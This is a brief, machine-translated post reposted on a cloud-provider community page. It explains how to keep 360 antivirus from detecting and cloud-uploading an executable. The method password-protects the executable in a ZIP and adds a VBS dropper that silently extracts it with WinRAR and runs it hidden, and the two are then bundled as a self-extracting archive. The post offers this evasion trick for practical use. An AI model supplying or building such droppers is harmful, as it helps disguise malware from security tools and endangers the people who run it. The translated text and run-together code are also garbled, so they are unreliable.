Encrypted compression anti-360 cloud upload

Source: Internet
Author: User
The idea is very simple, mainly compressed package plus password, so 360 is not recognized. Now the file encryption compression, remember the ZIP format. Use a VBS to decompress the run. Then bundle the two files again into self-extracting, unzip and run the VBS VBS code: On Error Resume Nextset objwsh = CreateObject ("Wscript.Shell") objwsh.run "WinRAR x-o+- PZuozuo c:\1.zip 1.exe \ ", 0,trueobjwsh.run" C:\1.exe C: ", 0,trueset objwsh = Nothing Above the code is understood, the red part is the extracted password. The rest will not be explained. The idea is simple, the method is a bit old, but as a means of comprehensive use it. Mainly to a certain extent, anti-upload.

Encrypted compression anti-360 cloud upload

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.